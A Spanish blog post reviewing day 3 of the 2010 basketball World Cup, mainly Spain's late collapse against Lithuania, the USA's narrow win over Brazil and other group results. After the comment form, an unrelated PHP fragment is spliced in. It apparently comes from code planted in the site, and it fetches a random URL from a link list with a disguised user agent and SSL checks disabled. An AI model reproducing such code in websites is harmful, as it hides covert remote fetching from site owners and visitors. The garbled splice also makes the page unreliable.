Mundobasket 2010, Jornada 3

01 de September de 2010 por TheDeerHunter

Se empieza a palpar la emoción del campeonato del mundo.

Los actuales campeones se complicaron anoche totalmente la vida en su objetivo de optar a las medallas. Se puede perder contra Lituania con jugadores tan peligrosos como Kleiza o Kalnietis. Es respetable, pero nunca tras ir ganando por casi 20 puntos al final del tercer cuarto y sufrir la más oscura de las pájaras en el tramo decisivo. Indigno de todo unos aspirantes a campeones del mundo.

Se detectan 2 problemas graves a primera vista: Por un lado, con jugadores del nivel de Navarro, Marc o Rudy no debería ser difícil encontrar un referente. Por el otro, parece que se está convirtiendo en costumbre el que abusen de la selección bajo tableros. Ayer, Fran capturó 1 rebote, los mismos que Felipe Reyes y sólo 2 menos que Garbajosa. Por mucho que Rudy esté destacando  particularmente en esta faceta intuyo que ambos temas podrían corregirse en parte pasándole a la segunda unidad. Tras el nivel mostrado por Mumbrú en la preparación, su rol ahora parece ser uno de los errores cometidos por Scariolo. Como alero alto que es cierra mejor ese aspecto y su inclusión  en la primera unidad definiría mejor los roles mejorando el rendimiento de la segunda con la participación de Rudy Fernández.

También hay que señalar que sus afamados sistemas defensivos han hecho más agua cuanto más caliente ha sido el momento. Si esa debería ser la mayor virtud y es ese aspecto el que más han trabajado lo tenemos claro. Comparar esta situación con lo que pasó en el Europeo o en el Mundial de futbol es, con perdón, de ilusos. Ahora mismo es impensable que esta España pudiera batir a esta USA en el más que posible cruce de cuartos. Por suerte quedan cosas por decir y la calidad se presupone. Hay que levantarse.

Los americanos también le vieron las orejas al lobo contra Brasil el otro día. El choque fue fabuloso y los estadounidenses tuvieron que tirar de calidad, jerarquía (arbitros) y mucha suerte para no hincar la rodilla. Los carioca ni siquiera tiraron de defensas zonales sino que fue todo a base de piernas y del talento de Splitter, Barbosa y Marcelinho Huertas. Podría decir sin temor a equivocarme que fueron superiores. Los 27 puntos de Durant y la resolución de Billups salvaron la complicada papeleta. Quién dijo aquello de que el base está acabado que observe con atención estos partidos y a quién le dan el balón cuando quema sus compañeros.

Precioso también el choque entre Slovenia y Croacia. Concierto de triples con un acierto impresionante (22 de 42 entre ambos) pero el duelo se decidió más cerca del aro: quien lanzó mejor de dos, cogió más rebotes (en algo destacó Brezec) y tiró menos horrible los tiros libres se llevó el gato al agua. Los eslovenos se impusieron gracias a la tríada Slokar – Lakovic – Dragic.

En el resto de partidos del grupo A, Argentina volvió a tirar de Scola para tumbar sin problemas a Angola, Alemania hizo el ridículo contra Australia en la resaca de su sorpresa ante Serbia, y la misma Serbia destrozó a Jordania.

En el grupo B, Hadaddi se salió en la victoria de Irán a Túnez (posiblemente la única que logren).

En el C, Rusia sufrió contra Costa de Marfil con un gran actuación de Mozgov, los 24 de Yianlian no sirvieron para superar a Puerto Rico y Turquía doblegó a Grecia con un destacado Ilyasova (y con Turkoglu en 2/12 destacando en el otro sentido).

Finalmente, en el D, Francia aguantó contra Canadá de la mano de Nicolás Batum y Nueva Zelanda destrozó al Líbano con 26 de Penney y 23 de Abercrombie.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>